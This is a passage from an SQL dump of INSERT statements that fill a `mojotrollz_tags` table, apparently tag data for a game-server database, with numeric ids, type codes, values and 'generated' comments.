(`id`, `table`, `type`, `value`, `comment`) VALUES (10977, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10978, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10978, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10979, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10979, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10980, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10981, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10981, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10981, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10982, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10982, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10982, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10983, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10984, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10986, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10986, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10986, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10987, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10987, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10987, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10988, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10990, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10990, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10990, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10991, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10991, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10991, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10992, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10992, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10993, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10993, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10996, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10997, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10997, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10997, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11016, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11016, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11017, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11017, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11017, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11017, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11017, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11017, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11018, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11019, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11019, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11020, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11020, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11021, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11022, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11022, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11023, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11023, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11024, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11024, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11025, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11025, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11025, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11025, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11025, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11025, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11026, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11026, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11027, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11028, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11028, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11029, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11029, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11030, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11031, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11031, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11031, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11031, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11031, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11032, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11032, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11032, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11033, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11033, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11034, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11034, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11035, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11035, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11036, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11036, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11037, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11037, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11038, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11038, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11039, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11039, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11040, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11040, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11041, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11041, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11042, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11042, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11043, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11043, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11043, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11044, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11044, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11044, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11044, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11044, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11046, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11046, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11046, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11046, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11046, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11046, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11047, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11047, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11048, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11048, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11048, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11048, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11048, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11049, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11049, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11049, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11049, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11049, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11050, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11050, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11051, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11051, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11052, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11052, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11053, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11053, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11054, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11055, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11055, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11056, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11056, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11057, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11057, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11058, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11063, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11063, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11064, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11065, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11065, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11066, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11066, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11066, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11066, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11066, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11066, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11067, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11067, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11067, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11067, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11067, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11068, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11068, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11069, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11069, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11070, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11070, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11071, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11071, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11072, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11072, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11073, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11073, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11073, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11074, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11074, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11075, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11076, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11077, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11078, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11079, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11079, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11081, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11081, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11082, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11082, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11082, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11083, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11083, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11084, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11084, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11096, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11096, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11097, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11097, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11098, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11098, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11099, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11100, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11101, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11102, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11102, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11103, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11103, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11104, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11104, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11105, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11105, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11106, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11106, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11116, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11116, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11117, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11117, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11118, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11118, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11119, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11119, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11120, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11121, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11122, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11136, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11137, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11137, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11138, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11138, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11139, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11139, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11140, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11140, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11141, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11142, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11143, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11145, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11145, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11146, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11146, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11147, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11148, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11149, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11150, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11151, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11152, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11152, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11153, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, 